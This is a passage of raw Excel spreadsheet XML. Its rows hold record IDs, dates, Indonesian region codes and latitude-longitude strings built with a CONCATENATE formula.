      </c>
      <c r="W3711" s="5">
        <v>-624109</v>
      </c>
      <c r="X3711" t="s">
        <v>19965</v>
      </c>
      <c r="Y3711" t="str">
        <f t="shared" si="57"/>
        <v>-6.24109,106.89378</v>
      </c>
    </row>
    <row r="3712" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3712">
        <v>286306</v>
      </c>
      <c r="B3712" s="1">
        <v>44300</v>
      </c>
      <c r="C3712" s="2">
        <v>0.61979166666666663</v>
      </c>
      <c r="D3712" t="s">
        <v>22</v>
      </c>
      <c r="E3712" t="s">
        <v>23</v>
      </c>
      <c r="F3712" t="s">
        <v>12274</v>
      </c>
      <c r="H3712" t="s">
        <v>26</v>
      </c>
      <c r="I3712" t="s">
        <v>1316</v>
      </c>
      <c r="J3712" t="s">
        <v>2627</v>
      </c>
      <c r="L3712" t="s">
        <v>12275</v>
      </c>
      <c r="M3712">
        <v>3275020006</v>
      </c>
      <c r="N3712">
        <v>3275020</v>
      </c>
      <c r="O3712">
        <v>3275</v>
      </c>
      <c r="P3712">
        <v>32</v>
      </c>
      <c r="Q3712" t="s">
        <v>4024</v>
      </c>
      <c r="R3712" t="s">
        <v>828</v>
      </c>
      <c r="S3712" t="s">
        <v>41</v>
      </c>
      <c r="T3712" t="s">
        <v>42</v>
      </c>
      <c r="U3712" s="5">
        <v>10694173</v>
      </c>
      <c r="V3712" s="5" t="s">
        <v>15941</v>
      </c>
      <c r="W3712" s="5">
        <v>-626889</v>
      </c>
      <c r="X3712" t="s">
        <v>21526</v>
      </c>
      <c r="Y3712" t="str">
        <f t="shared" si="57"/>
        <v>-6.26889,106.94173</v>
      </c>
    </row>
    <row r="3713" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3713">
        <v>286942</v>
      </c>
      <c r="B3713" s="1">
        <v>44301</v>
      </c>
      <c r="C3713" s="2">
        <v>0.35412037037037036</v>
      </c>
      <c r="D3713" t="s">
        <v>22</v>
      </c>
      <c r="E3713" t="s">
        <v>23</v>
      </c>
      <c r="F3713" t="s">
        <v>12276</v>
      </c>
      <c r="G3713" t="s">
        <v>12277</v>
      </c>
      <c r="H3713" t="s">
        <v>7978</v>
      </c>
      <c r="I3713" t="s">
        <v>7979</v>
      </c>
      <c r="J3713" t="s">
        <v>3135</v>
      </c>
      <c r="L3713" t="s">
        <v>12278</v>
      </c>
      <c r="M3713">
        <v>3674020010</v>
      </c>
      <c r="N3713">
        <v>3674020</v>
      </c>
      <c r="O3713">
        <v>3674</v>
      </c>
      <c r="P3713">
        <v>36</v>
      </c>
      <c r="Q3713" t="s">
        <v>12279</v>
      </c>
      <c r="R3713" t="s">
        <v>10558</v>
      </c>
      <c r="S3713" t="s">
        <v>170</v>
      </c>
      <c r="T3713" t="s">
        <v>171</v>
      </c>
      <c r="U3713" s="5">
        <v>10669413</v>
      </c>
      <c r="V3713" s="5" t="s">
        <v>17791</v>
      </c>
      <c r="W3713" s="5">
        <v>-632632</v>
      </c>
      <c r="X3713" t="s">
        <v>21527</v>
      </c>
      <c r="Y3713" t="str">
        <f t="shared" si="57"/>
        <v>-6.32632,106.69413</v>
      </c>
    </row>
    <row r="3714" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3714">
        <v>287428</v>
      </c>
      <c r="B3714" s="1">
        <v>44302</v>
      </c>
      <c r="C3714" s="2">
        <v>0.22113425925925925</v>
      </c>
      <c r="D3714" t="s">
        <v>22</v>
      </c>
      <c r="E3714" t="s">
        <v>23</v>
      </c>
      <c r="F3714" t="s">
        <v>12280</v>
      </c>
      <c r="H3714" t="s">
        <v>26</v>
      </c>
      <c r="I3714" t="s">
        <v>137</v>
      </c>
      <c r="J3714" t="s">
        <v>1585</v>
      </c>
      <c r="L3714" t="s">
        <v>12281</v>
      </c>
      <c r="M3714">
        <v>3173060006</v>
      </c>
      <c r="N3714">
        <v>3173060</v>
      </c>
      <c r="O3714">
        <v>3173</v>
      </c>
      <c r="P3714">
        <v>31</v>
      </c>
      <c r="Q3714" t="s">
        <v>1587</v>
      </c>
      <c r="R3714" t="s">
        <v>61</v>
      </c>
      <c r="S3714" t="s">
        <v>62</v>
      </c>
      <c r="T3714" t="s">
        <v>33</v>
      </c>
      <c r="U3714" s="5">
        <v>10685524</v>
      </c>
      <c r="V3714" s="5" t="s">
        <v>17792</v>
      </c>
      <c r="W3714" s="5">
        <v>-615251</v>
      </c>
      <c r="X3714" t="s">
        <v>21528</v>
      </c>
      <c r="Y3714" t="str">
        <f t="shared" si="57"/>
        <v>-6.15251,106.85524</v>
      </c>
    </row>
    <row r="3715" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3715">
        <v>287429</v>
      </c>
      <c r="B3715" s="1">
        <v>44303</v>
      </c>
      <c r="C3715" s="2">
        <v>6.0416666666666667E-2</v>
      </c>
      <c r="D3715" t="s">
        <v>2648</v>
      </c>
      <c r="E3715" t="s">
        <v>23</v>
      </c>
      <c r="G3715" t="s">
        <v>12282</v>
      </c>
      <c r="H3715" t="s">
        <v>26</v>
      </c>
      <c r="J3715" t="s">
        <v>2879</v>
      </c>
      <c r="L3715" t="s">
        <v>12283</v>
      </c>
      <c r="M3715">
        <v>3172070004</v>
      </c>
      <c r="N3715">
        <v>3172070</v>
      </c>
      <c r="O3715">
        <v>3172</v>
      </c>
      <c r="P3715">
        <v>31</v>
      </c>
      <c r="Q3715" t="s">
        <v>2880</v>
      </c>
      <c r="R3715" t="s">
        <v>128</v>
      </c>
      <c r="S3715" t="s">
        <v>49</v>
      </c>
      <c r="T3715" t="s">
        <v>33</v>
      </c>
      <c r="U3715" s="5">
        <v>10694154</v>
      </c>
      <c r="V3715" s="5" t="s">
        <v>15954</v>
      </c>
      <c r="W3715" s="5">
        <v>-622064</v>
      </c>
      <c r="X3715" t="s">
        <v>21529</v>
      </c>
      <c r="Y3715" t="str">
        <f t="shared" ref="Y3715:Y3778" si="58">CONCATENATE(X3715,",",V3715)</f>
        <v>-6.22064,106.94154</v>
      </c>
    </row>
    <row r="3716" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3716">
        <v>287433</v>
      </c>
      <c r="B3716" s="1">
        <v>44303</v>
      </c>
      <c r="C3716" s="2">
        <v>7.6446759259259256E-2</v>
      </c>
      <c r="D3716" t="s">
        <v>22</v>
      </c>
      <c r="E3716" t="s">
        <v>23</v>
      </c>
      <c r="F3716" s="3" t="s">
        <v>12284</v>
      </c>
      <c r="G3716" t="s">
        <v>12285</v>
      </c>
      <c r="H3716" t="s">
        <v>26</v>
      </c>
      <c r="I3716" t="s">
        <v>137</v>
      </c>
      <c r="J3716" t="s">
        <v>2608</v>
      </c>
      <c r="L3716" t="s">
        <v>12286</v>
      </c>
      <c r="M3716">
        <v>3301020003</v>
      </c>
      <c r="N3716">
        <v>3301020</v>
      </c>
      <c r="O3716">
        <v>3301</v>
      </c>
      <c r="P3716">
        <v>33</v>
      </c>
      <c r="Q3716" t="s">
        <v>8297</v>
      </c>
      <c r="R3716" t="s">
        <v>8298</v>
      </c>
      <c r="S3716" t="s">
        <v>2642</v>
      </c>
      <c r="T3716" t="s">
        <v>1134</v>
      </c>
      <c r="U3716" s="5">
        <v>10869465</v>
      </c>
      <c r="V3716" s="5" t="s">
        <v>17793</v>
      </c>
      <c r="W3716" s="5">
        <v>-739628</v>
      </c>
      <c r="X3716" t="s">
        <v>21530</v>
      </c>
      <c r="Y3716" t="str">
        <f t="shared" si="58"/>
        <v>-7.39628,108.69465</v>
      </c>
    </row>
    <row r="3717" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3717">
        <v>287436</v>
      </c>
      <c r="B3717" s="1">
        <v>44303</v>
      </c>
      <c r="C3717" s="2">
        <v>7.8657407407407412E-2</v>
      </c>
      <c r="D3717" t="s">
        <v>22</v>
      </c>
      <c r="E3717" t="s">
        <v>23</v>
      </c>
      <c r="F3717" t="s">
        <v>12287</v>
      </c>
      <c r="H3717" t="s">
        <v>26</v>
      </c>
      <c r="I3717" t="s">
        <v>1009</v>
      </c>
      <c r="J3717" t="s">
        <v>2627</v>
      </c>
      <c r="L3717" t="s">
        <v>250</v>
      </c>
      <c r="M3717">
        <v>3216070014</v>
      </c>
      <c r="N3717">
        <v>3216070</v>
      </c>
      <c r="O3717">
        <v>3216</v>
      </c>
      <c r="P3717">
        <v>32</v>
      </c>
      <c r="Q3717" t="s">
        <v>5478</v>
      </c>
      <c r="R3717" t="s">
        <v>5479</v>
      </c>
      <c r="S3717" t="s">
        <v>41</v>
      </c>
      <c r="T3717" t="s">
        <v>42</v>
      </c>
      <c r="U3717" s="5">
        <v>10709425</v>
      </c>
      <c r="V3717" s="5" t="s">
        <v>17794</v>
      </c>
      <c r="W3717" s="5">
        <v>-624377</v>
      </c>
      <c r="X3717" t="s">
        <v>18294</v>
      </c>
      <c r="Y3717" t="str">
        <f t="shared" si="58"/>
        <v>-6.24377,107.09425</v>
      </c>
    </row>
    <row r="3718" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3718">
        <v>287437</v>
      </c>
      <c r="B3718" s="1">
        <v>44306</v>
      </c>
      <c r="C3718" s="2">
        <v>5.8217592592592592E-2</v>
      </c>
      <c r="D3718" t="s">
        <v>22</v>
      </c>
      <c r="E3718" t="s">
        <v>23</v>
      </c>
      <c r="F3718" t="s">
        <v>12288</v>
      </c>
      <c r="H3718" t="s">
        <v>7086</v>
      </c>
      <c r="I3718" t="s">
        <v>7733</v>
      </c>
      <c r="J3718" t="s">
        <v>6038</v>
      </c>
      <c r="L3718" t="s">
        <v>12289</v>
      </c>
      <c r="M3718">
        <v>1275090001</v>
      </c>
      <c r="N3718">
        <v>1275090</v>
      </c>
      <c r="O3718">
        <v>1275</v>
      </c>
      <c r="P3718">
        <v>12</v>
      </c>
      <c r="Q3718" t="s">
        <v>12290</v>
      </c>
      <c r="R3718" t="s">
        <v>12291</v>
      </c>
      <c r="S3718" t="s">
        <v>7704</v>
      </c>
      <c r="T3718" t="s">
        <v>6043</v>
      </c>
      <c r="U3718" s="5">
        <v>9865517</v>
      </c>
      <c r="V3718" s="5" t="s">
        <v>17795</v>
      </c>
      <c r="W3718" s="5">
        <v>355026</v>
      </c>
      <c r="X3718" t="s">
        <v>21531</v>
      </c>
      <c r="Y3718" t="str">
        <f t="shared" si="58"/>
        <v>3.55026,98.65517</v>
      </c>
    </row>
    <row r="3719" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3719">
        <v>287612</v>
      </c>
      <c r="B3719" s="1">
        <v>44307</v>
      </c>
      <c r="C3719" s="2">
        <v>0.15795138888888891</v>
      </c>
      <c r="D3719" t="s">
        <v>22</v>
      </c>
      <c r="E3719" t="s">
        <v>23</v>
      </c>
      <c r="F3719" t="s">
        <v>12292</v>
      </c>
      <c r="H3719" t="s">
        <v>7086</v>
      </c>
      <c r="I3719" t="s">
        <v>12293</v>
      </c>
      <c r="J3719" t="s">
        <v>8639</v>
      </c>
      <c r="L3719" t="s">
        <v>12294</v>
      </c>
      <c r="M3719">
        <v>1503040017</v>
      </c>
      <c r="N3719">
        <v>1503040</v>
      </c>
      <c r="O3719">
        <v>1503</v>
      </c>
      <c r="P3719">
        <v>15</v>
      </c>
      <c r="Q3719" t="s">
        <v>12295</v>
      </c>
      <c r="R3719" t="s">
        <v>12296</v>
      </c>
      <c r="S3719" t="s">
        <v>12296</v>
      </c>
      <c r="T3719" t="s">
        <v>8643</v>
      </c>
      <c r="U3719" s="5">
        <v>10274856</v>
      </c>
      <c r="V3719" s="5" t="s">
        <v>17796</v>
      </c>
      <c r="W3719" s="5">
        <v>-231232</v>
      </c>
      <c r="X3719" t="s">
        <v>21532</v>
      </c>
      <c r="Y3719" t="str">
        <f t="shared" si="58"/>
        <v>-2.31232,102.74856</v>
      </c>
    </row>
    <row r="3720" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3720">
        <v>287747</v>
      </c>
      <c r="B3720" s="1">
        <v>44307</v>
      </c>
      <c r="C3720" s="2">
        <v>0.16900462962962962</v>
      </c>
      <c r="D3720" t="s">
        <v>22</v>
      </c>
      <c r="E3720" t="s">
        <v>23</v>
      </c>
      <c r="F3720" t="s">
        <v>12297</v>
      </c>
      <c r="H3720" t="s">
        <v>26</v>
      </c>
      <c r="I3720" t="s">
        <v>137</v>
      </c>
      <c r="J3720" t="s">
        <v>6707</v>
      </c>
      <c r="L3720" t="s">
        <v>12298</v>
      </c>
      <c r="M3720">
        <v>5206030012</v>
      </c>
      <c r="N3720">
        <v>5206030</v>
      </c>
      <c r="O3720">
        <v>5206</v>
      </c>
      <c r="P3720">
        <v>52</v>
      </c>
      <c r="Q3720" t="s">
        <v>12299</v>
      </c>
      <c r="R3720" t="s">
        <v>12090</v>
      </c>
      <c r="S3720" t="s">
        <v>12085</v>
      </c>
      <c r="T3720" t="s">
        <v>2154</v>
      </c>
      <c r="U3720" s="5">
        <v>11867004</v>
      </c>
      <c r="V3720" s="5" t="s">
        <v>17797</v>
      </c>
      <c r="W3720" s="5">
        <v>-856160</v>
      </c>
      <c r="X3720" t="s">
        <v>21533</v>
      </c>
      <c r="Y3720" t="str">
        <f t="shared" si="58"/>
        <v>-8.56160,118.67004</v>
      </c>
    </row>
    <row r="3721" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3721">
        <v>287796</v>
      </c>
      <c r="B3721" s="1">
        <v>44307</v>
      </c>
      <c r="C3721" s="2">
        <v>0.1784375</v>
      </c>
      <c r="D3721" t="s">
        <v>22</v>
      </c>
      <c r="E3721" t="s">
        <v>23</v>
      </c>
      <c r="F3721" t="s">
        <v>12300</v>
      </c>
      <c r="H3721" t="s">
        <v>7978</v>
      </c>
      <c r="I3721" t="s">
        <v>7979</v>
      </c>
      <c r="J3721" t="s">
        <v>7509</v>
      </c>
      <c r="L3721" t="s">
        <v>12301</v>
      </c>
      <c r="M3721">
        <v>1371050034</v>
      </c>
      <c r="N3721">
        <v>1371050</v>
      </c>
      <c r="O3721">
        <v>1371</v>
      </c>
      <c r="P3721">
        <v>13</v>
      </c>
      <c r="Q3721" t="s">
        <v>12302</v>
      </c>
      <c r="R3721" t="s">
        <v>12303</v>
      </c>
      <c r="S3721" t="s">
        <v>7513</v>
      </c>
      <c r="T3721" t="s">
        <v>7514</v>
      </c>
      <c r="U3721" s="5">
        <v>10037273</v>
      </c>
      <c r="V3721" s="5" t="s">
        <v>17798</v>
      </c>
      <c r="W3721" s="5">
        <v>-93925</v>
      </c>
      <c r="X3721" t="s">
        <v>21534</v>
      </c>
      <c r="Y3721" t="str">
        <f t="shared" si="58"/>
        <v xml:space="preserve"> -0.93925,100.37273</v>
      </c>
    </row>
    <row r="3722" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3722">
        <v>287868</v>
      </c>
      <c r="B3722" s="1">
        <v>44307</v>
      </c>
      <c r="C3722" s="2">
        <v>0.1950462962962963</v>
      </c>
      <c r="D3722" t="s">
        <v>22</v>
      </c>
      <c r="E3722" t="s">
        <v>23</v>
      </c>
      <c r="F3722" t="s">
        <v>12304</v>
      </c>
      <c r="H3722" t="s">
        <v>26</v>
      </c>
      <c r="I3722" t="s">
        <v>661</v>
      </c>
      <c r="J3722" t="s">
        <v>7678</v>
      </c>
      <c r="L3722" t="s">
        <v>12305</v>
      </c>
      <c r="M3722">
        <v>7202050009</v>
      </c>
      <c r="N3722">
        <v>7202050</v>
      </c>
      <c r="O3722">
        <v>7202</v>
      </c>
      <c r="P3722">
        <v>72</v>
      </c>
      <c r="Q3722" t="s">
        <v>12306</v>
      </c>
      <c r="R3722" t="s">
        <v>12306</v>
      </c>
      <c r="S3722" t="s">
        <v>7682</v>
      </c>
      <c r="T3722" t="s">
        <v>7683</v>
      </c>
      <c r="U3722" s="5">
        <v>12278925</v>
      </c>
      <c r="V3722" s="5" t="s">
        <v>17799</v>
      </c>
      <c r="W3722" s="5">
        <v>-95408</v>
      </c>
      <c r="X3722" t="s">
        <v>21535</v>
      </c>
      <c r="Y3722" t="str">
        <f t="shared" si="58"/>
        <v xml:space="preserve"> -0.95408,122.78925</v>
      </c>
    </row>
    <row r="3723" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3723">
        <v>287882</v>
      </c>
      <c r="B3723" s="1">
        <v>44307</v>
      </c>
      <c r="C3723" s="2">
        <v>0.19996527777777776</v>
      </c>
      <c r="D3723" t="s">
        <v>22</v>
      </c>
      <c r="E3723" t="s">
        <v>23</v>
      </c>
      <c r="F3723" t="s">
        <v>12307</v>
      </c>
      <c r="H3723" t="s">
        <v>26</v>
      </c>
      <c r="I3723" t="s">
        <v>666</v>
      </c>
      <c r="J3723" t="s">
        <v>7509</v>
      </c>
      <c r="L3723" t="s">
        <v>12308</v>
      </c>
      <c r="M3723">
        <v>1371040028</v>
      </c>
      <c r="N3723">
        <v>1371040</v>
      </c>
      <c r="O3723">
        <v>1371</v>
      </c>
      <c r="P3723">
        <v>13</v>
      </c>
      <c r="Q3723" t="s">
        <v>12309</v>
      </c>
      <c r="R3723" t="s">
        <v>12310</v>
      </c>
      <c r="S3723" t="s">
        <v>7513</v>
      </c>
      <c r="T3723" t="s">
        <v>7514</v>
      </c>
      <c r="U3723" s="5">
        <v>10037502</v>
      </c>
      <c r="V3723" s="5" t="s">
        <v>17800</v>
      </c>
      <c r="W3723" s="5">
        <v>-95747</v>
      </c>
      <c r="X3723" t="s">
        <v>21536</v>
      </c>
      <c r="Y3723" t="str">
        <f t="shared" si="58"/>
        <v xml:space="preserve"> -0.95747,100.37502</v>
      </c>
    </row>
    <row r="3724" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3724">
        <v>287913</v>
      </c>
      <c r="B3724" s="1">
        <v>44307</v>
      </c>
      <c r="C3724" s="2">
        <v>0.25503472222222223</v>
      </c>
      <c r="D3724" t="s">
        <v>22</v>
      </c>
      <c r="E3724" t="s">
        <v>23</v>
      </c>
      <c r="F3724" t="s">
        <v>12311</v>
      </c>
      <c r="H3724" t="s">
        <v>7086</v>
      </c>
      <c r="I3724" t="s">
        <v>7733</v>
      </c>
      <c r="J3724" t="s">
        <v>2608</v>
      </c>
      <c r="L3724" t="s">
        <v>12312</v>
      </c>
      <c r="M3724">
        <v>3301200008</v>
      </c>
      <c r="N3724">
        <v>3301200</v>
      </c>
      <c r="O3724">
        <v>3301</v>
      </c>
      <c r="P3724">
        <v>33</v>
      </c>
      <c r="Q3724" t="s">
        <v>12313</v>
      </c>
      <c r="R3724" t="s">
        <v>12314</v>
      </c>
      <c r="S3724" t="s">
        <v>2642</v>
      </c>
      <c r="T3724" t="s">
        <v>1134</v>
      </c>
      <c r="U3724" s="5">
        <v>10934988</v>
      </c>
      <c r="V3724" s="5" t="s">
        <v>17801</v>
      </c>
      <c r="W3724" s="5">
        <v>-768280</v>
      </c>
      <c r="X3724" t="s">
        <v>21537</v>
      </c>
      <c r="Y3724" t="str">
        <f t="shared" si="58"/>
        <v>-7.68280,109.34988</v>
      </c>
    </row>
    <row r="3725" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3725">
        <v>287917</v>
      </c>
      <c r="B3725" s="1">
        <v>44307</v>
      </c>
      <c r="C3725" s="2">
        <v>0.26915509259259257</v>
      </c>
      <c r="D3725" t="s">
        <v>22</v>
      </c>
      <c r="E3725" t="s">
        <v>23</v>
      </c>
      <c r="F3725" t="s">
        <v>12315</v>
      </c>
      <c r="H3725" t="s">
        <v>12316</v>
      </c>
      <c r="I3725" t="s">
        <v>12317</v>
      </c>
      <c r="J3725" t="s">
        <v>2622</v>
      </c>
      <c r="L3725" t="s">
        <v>12318</v>
      </c>
      <c r="M3725">
        <v>3516170016</v>
      </c>
      <c r="N3725">
        <v>3516170</v>
      </c>
      <c r="O3725">
        <v>3516</v>
      </c>
      <c r="P3725">
        <v>35</v>
      </c>
      <c r="Q3725" t="s">
        <v>12319</v>
      </c>
      <c r="R3725" t="s">
        <v>12320</v>
      </c>
      <c r="S3725" t="s">
        <v>8728</v>
      </c>
      <c r="T3725" t="s">
        <v>1221</v>
      </c>
      <c r="U3725" s="5">
        <v>11247490</v>
      </c>
      <c r="V3725" s="5" t="s">
        <v>17802</v>
      </c>
      <c r="W3725" s="5">
        <v>-734879</v>
      </c>
      <c r="X3725" t="s">
        <v>21538</v>
      </c>
      <c r="Y3725" t="str">
        <f t="shared" si="58"/>
        <v>-7.34879,112.47490</v>
      </c>
    </row>
    <row r="3726" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3726">
        <v>287923</v>
      </c>
      <c r="B3726" s="1">
        <v>44307</v>
      </c>
      <c r="C3726" s="2">
        <v>0.35123842592592597</v>
      </c>
      <c r="D3726" t="s">
        <v>22</v>
      </c>
      <c r="E3726" t="s">
        <v>23</v>
      </c>
      <c r="F3726" t="s">
        <v>12321</v>
      </c>
      <c r="H3726" t="s">
        <v>26</v>
      </c>
      <c r="I3726" t="s">
        <v>5309</v>
      </c>
      <c r="J3726" t="s">
        <v>12322</v>
      </c>
      <c r="L3726" t="s">
        <v>12323</v>
      </c>
      <c r="M3726">
        <v>3175040002</v>
      </c>
      <c r="N3726">
        <v>3175040</v>
      </c>
      <c r="O3726">
        <v>3175</v>
      </c>
      <c r="P3726">
        <v>31</v>
      </c>
      <c r="Q3726" t="s">
        <v>2730</v>
      </c>
      <c r="R3726" t="s">
        <v>2063</v>
      </c>
      <c r="S3726" t="s">
        <v>547</v>
      </c>
      <c r="T3726" t="s">
        <v>33</v>
      </c>
      <c r="U3726" s="5">
        <v>10690968</v>
      </c>
      <c r="V3726" s="5" t="s">
        <v>15921</v>
      </c>
      <c r="W3726" s="5">
        <v>-614194</v>
      </c>
      <c r="X3726" t="s">
        <v>21539</v>
      </c>
      <c r="Y3726" t="str">
        <f t="shared" si="58"/>
        <v>-6.14194,106.90968</v>
      </c>
    </row>
    <row r="3727" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3727">
        <v>287971</v>
      </c>
      <c r="B3727" s="1">
        <v>44308</v>
      </c>
      <c r="C3727" s="2">
        <v>0.14663194444444444</v>
      </c>
      <c r="D3727" t="s">
        <v>22</v>
      </c>
      <c r="E3727" t="s">
        <v>23</v>
      </c>
      <c r="F3727" t="s">
        <v>12324</v>
      </c>
      <c r="G3727" t="s">
        <v>12325</v>
      </c>
      <c r="H3727" t="s">
        <v>26</v>
      </c>
      <c r="I3727" t="s">
        <v>2962</v>
      </c>
      <c r="J3727" t="s">
        <v>2627</v>
      </c>
      <c r="L3727" t="s">
        <v>12326</v>
      </c>
      <c r="M3727">
        <v>3204260003</v>
      </c>
      <c r="N3727">
        <v>3204260</v>
      </c>
      <c r="O3727">
        <v>3204</v>
      </c>
      <c r="P3727">
        <v>32</v>
      </c>
      <c r="Q3727" t="s">
        <v>6771</v>
      </c>
      <c r="R3727" t="s">
        <v>2956</v>
      </c>
      <c r="S3727" t="s">
        <v>1464</v>
      </c>
      <c r="T3727" t="s">
        <v>42</v>
      </c>
      <c r="U3727" s="5">
        <v>10757262</v>
      </c>
      <c r="V3727" s="5" t="s">
        <v>17803</v>
      </c>
      <c r="W3727" s="5">
        <v>-697058</v>
      </c>
      <c r="X3727" t="s">
        <v>21540</v>
      </c>
      <c r="Y3727" t="str">
        <f t="shared" si="58"/>
        <v>-6.97058,107.57262</v>
      </c>
    </row>
    <row r="3728" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3728">
        <v>288086</v>
      </c>
      <c r="B3728" s="1">
        <v>44308</v>
      </c>
      <c r="C3728" s="2">
        <v>0.15920138888888888</v>
      </c>
      <c r="D3728" t="s">
        <v>22</v>
      </c>
      <c r="E3728" t="s">
        <v>23</v>
      </c>
      <c r="F3728" s="3" t="s">
        <v>12327</v>
      </c>
      <c r="H3728" t="s">
        <v>26</v>
      </c>
      <c r="I3728" t="s">
        <v>137</v>
      </c>
      <c r="J3728" t="s">
        <v>12328</v>
      </c>
      <c r="L3728" t="s">
        <v>12329</v>
      </c>
      <c r="M3728">
        <v>6571030004</v>
      </c>
      <c r="N3728">
        <v>6571030</v>
      </c>
      <c r="O3728">
        <v>6571</v>
      </c>
      <c r="P3728">
        <v>65</v>
      </c>
      <c r="Q3728" t="s">
        <v>12330</v>
      </c>
      <c r="R3728" t="s">
        <v>12331</v>
      </c>
      <c r="S3728" t="s">
        <v>12332</v>
      </c>
      <c r="T3728" t="s">
        <v>12333</v>
      </c>
      <c r="U3728" s="5">
        <v>11758162</v>
      </c>
      <c r="V3728" s="5" t="s">
        <v>17804</v>
      </c>
      <c r="W3728" s="5">
        <v>331172</v>
      </c>
      <c r="X3728" t="s">
        <v>21541</v>
      </c>
      <c r="Y3728" t="str">
        <f t="shared" si="58"/>
        <v>3.31172,117.58162</v>
      </c>
    </row>
    <row r="3729" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3729">
        <v>288213</v>
      </c>
      <c r="B3729" s="1">
        <v>44308</v>
      </c>
      <c r="C3729" s="2">
        <v>0.22434027777777776</v>
      </c>
      <c r="D3729" t="s">
        <v>22</v>
      </c>
      <c r="E3729" t="s">
        <v>23</v>
      </c>
      <c r="F3729" t="s">
        <v>12334</v>
      </c>
      <c r="G3729" t="s">
        <v>12335</v>
      </c>
      <c r="H3729" t="s">
        <v>26</v>
      </c>
      <c r="I3729" t="s">
        <v>1971</v>
      </c>
      <c r="J3729" t="s">
        <v>3135</v>
      </c>
      <c r="L3729" t="s">
        <v>12336</v>
      </c>
      <c r="M3729">
        <v>3671010012</v>
      </c>
      <c r="N3729">
        <v>3671010</v>
      </c>
      <c r="O3729">
        <v>3671</v>
      </c>
      <c r="P3729">
        <v>36</v>
      </c>
      <c r="Q3729" t="s">
        <v>12337</v>
      </c>
      <c r="R3729" t="s">
        <v>200</v>
      </c>
      <c r="S3729" t="s">
        <v>201</v>
      </c>
      <c r="T3729" t="s">
        <v>171</v>
      </c>
      <c r="U3729" s="5">
        <v>10671883</v>
      </c>
      <c r="V3729" s="5" t="s">
        <v>17805</v>
      </c>
      <c r="W3729" s="5">
        <v>-623819</v>
      </c>
      <c r="X3729" t="s">
        <v>21542</v>
      </c>
      <c r="Y3729" t="str">
        <f t="shared" si="58"/>
        <v>-6.23819,106.71883</v>
      </c>
    </row>
    <row r="3730" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3730">
        <v>288221</v>
      </c>
      <c r="B3730" s="1">
        <v>44308</v>
      </c>
      <c r="C3730" s="2">
        <v>0.30211805555555554</v>
      </c>
      <c r="D3730" t="s">
        <v>22</v>
      </c>
      <c r="E3730" t="s">
        <v>23</v>
      </c>
      <c r="F3730" t="s">
        <v>12338</v>
      </c>
      <c r="G3730" t="s">
        <v>12339</v>
      </c>
      <c r="H3730" t="s">
        <v>26</v>
      </c>
      <c r="I3730" t="s">
        <v>523</v>
      </c>
      <c r="J3730" t="s">
        <v>7171</v>
      </c>
      <c r="L3730" t="s">
        <v>12340</v>
      </c>
      <c r="M3730">
        <v>6404040016</v>
      </c>
      <c r="N3730">
        <v>6404040</v>
      </c>
      <c r="O3730">
        <v>6404</v>
      </c>
      <c r="P3730">
        <v>64</v>
      </c>
      <c r="Q3730" t="s">
        <v>12341</v>
      </c>
      <c r="R3730" t="s">
        <v>12342</v>
      </c>
      <c r="S3730" t="s">
        <v>9302</v>
      </c>
      <c r="T3730" t="s">
        <v>1308</v>
      </c>
      <c r="U3730" s="5">
        <v>11760437</v>
      </c>
      <c r="V3730" s="5" t="s">
        <v>17806</v>
      </c>
      <c r="W3730" s="5">
        <v>53342</v>
      </c>
      <c r="X3730" t="s">
        <v>14451</v>
      </c>
      <c r="Y3730" t="str">
        <f t="shared" si="58"/>
        <v>0.53342,117.60437</v>
      </c>
    </row>
    <row r="3731" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3731">
        <v>288248</v>
      </c>
      <c r="B3731" s="1">
        <v>44308</v>
      </c>
      <c r="C3731" s="2">
        <v>0.62774305555555554</v>
      </c>
      <c r="D3731" t="s">
        <v>22</v>
      </c>
      <c r="E3731" t="s">
        <v>23</v>
      </c>
      <c r="F3731" t="s">
        <v>12343</v>
      </c>
      <c r="G3731" t="s">
        <v>12344</v>
      </c>
      <c r="H3731" t="s">
        <v>7978</v>
      </c>
      <c r="I3731" t="s">
        <v>7979</v>
      </c>
      <c r="J3731" t="s">
        <v>2608</v>
      </c>
      <c r="L3731" t="s">
        <v>12345</v>
      </c>
      <c r="M3731">
        <v>3376040006</v>
      </c>
      <c r="N3731">
        <v>3376040</v>
      </c>
      <c r="O3731">
        <v>3376</v>
      </c>
      <c r="P3731">
        <v>33</v>
      </c>
      <c r="Q3731" t="s">
        <v>12346</v>
      </c>
      <c r="R3731" t="s">
        <v>12347</v>
      </c>
      <c r="S3731" t="s">
        <v>12348</v>
      </c>
      <c r="T3731" t="s">
        <v>1134</v>
      </c>
      <c r="U3731" s="5">
        <v>10910421</v>
      </c>
      <c r="V3731" s="5" t="s">
        <v>17807</v>
      </c>
      <c r="W3731" s="5">
        <v>-687874</v>
      </c>
      <c r="X3731" t="s">
        <v>21543</v>
      </c>
      <c r="Y3731" t="str">
        <f t="shared" si="58"/>
        <v>-6.87874,109.10421</v>
      </c>
    </row>
    <row r="3732" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3732">
        <v>288257</v>
      </c>
      <c r="B3732" s="1">
        <v>44309</v>
      </c>
      <c r="C3732" s="2">
        <v>0.49722222222222223</v>
      </c>
      <c r="D3732" t="s">
        <v>2648</v>
      </c>
      <c r="E3732" t="s">
        <v>23</v>
      </c>
      <c r="G3732" t="s">
        <v>12349</v>
      </c>
      <c r="H3732" t="s">
        <v>26</v>
      </c>
      <c r="J3732" t="s">
        <v>5747</v>
      </c>
      <c r="L3732" t="s">
        <v>12350</v>
      </c>
      <c r="M3732">
